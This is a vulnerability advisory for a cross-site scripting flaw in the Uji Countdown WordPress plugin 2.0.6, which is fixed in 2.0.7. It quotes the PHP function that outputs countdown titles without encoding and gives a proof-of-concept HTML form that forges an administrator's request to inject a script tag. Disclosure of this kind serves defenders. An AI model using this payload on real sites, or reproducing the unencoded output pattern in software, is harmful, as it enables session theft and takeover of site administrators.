Abstract
A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
OVE ID
OVE-20160724-0029
Tested versions
This issue was successfully tested on Uji Countdown WordPress Plugin version 2.0.6.
Fix
This issue is resolved in Uji Countdown version 2.0.7.
Introduction
The Uji Countdown WordPress Plugin allows users to display a countdown on their post or page. A Cross-Site Scripting vulnerability was found in the Uji Countdown WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf.
Details
The issue exists in the file /classes/class-uji-countdown-admin.php
and is caused by the lack of output encoding in the ujic_tabs_values()
function.
private function ujic_tabs_values() {
global $wpdb;
$ujictab = '';
$table_name = $wpdb->prefix . "uji_counter";
$ujic_datas = $wpdb->get_results( "SELECT * FROM $table_name ORDER BY `time` DESC" );
if ( !empty( $ujic_datas ) ) {
foreach ( $ujic_datas as $ujic ) {
$ujic_style = !empty( $ujic->style ) ? $ujic->style : 'classic';
$ujic_ico = '<span id="ujic-style-' . $ujic_style . '" class="ujic-types">' . $ujic_style . '</span>';
$ujictab .='<tr>
<td>' . $ujic->time . '</td>
<td>' . **$ujic->title** . '</td>
<td>' . $ujic_ico . '</td>
<td>
<a href="?page=uji-countdown&tab=tab_ujic_new&edit=' . $ujic->id . '"><i class="dashicons dashicons-welcome-write-blog"></i>Edit</a> | <a href="options-general.php?page=uji-countdown&del=' . $ujic->id . '"><i class="dashicons dashicons-trash"></i> Delete</a>
</td>
</tr>';
}
}
return $ujictab;
}
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
Proof of concept
<html>
<body>
<form action="http://<target>/wp-admin/options-general.php?page=uji-countdown&tab=tab_ujic_new&style=classic&save=true" method="POST">
<input type="hidden" name="ujic_style" value="classic" />
<input type="hidden" name="ujic_name" value=""><script>alert(1);</script>" />
<input type="hidden" name="ujic_goof" value="ABeeZee" />
<input type="hidden" name="ujic_pos" value="center" />
<input type="hidden" name="ujic_d" value="true" />
<input type="hidden" name="ujic_h" value="true" />
<input type="hidden" name="ujic_m" value="true" />
<input type="hidden" name="ujic_s" value="true" />
<input type="hidden" name="ujic_txt" value="true" />
<input type="hidden" name="ujic_size" value="32" />
<input type="hidden" name="ujic_col_dw" value="#a61ba6" />
<input type="hidden" name="ujic_col_up" value="#c368c3" />
<input type="hidden" name="ujic_col_txt" value="#ffffff" />
<input type="hidden" name="ujic_col_sw" value="#000000" />
<input type="hidden" name="ujic_col_lab" value="#000000" />
<input type="hidden" name="ujic_lab_sz" value="13" />
<input type="hidden" name="ujic_subscrFrmWidth" value="100" />
<input type="hidden" name="ujic_subscrFrmAboveText" value="Join Our Newsletter" />
<input type="hidden" name="ujic_subscrFrmInputText" value="Enter your email here" />
<input type="hidden" name="ujic_subscrFrmSubmitText" value="Subscribe" />
<input type="hidden" name="ujic_subscrFrmSubmitColor" value="#ab02b2" />
<input type="hidden" name="ujic_subscrFrmThanksMessage" value="Thanks for subscribing" />
<input type="hidden" name="ujic_subscrFrmErrorMessage" value="Invalid email address" />
<input type="hidden" name="submit_ujic" value="Save Style" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>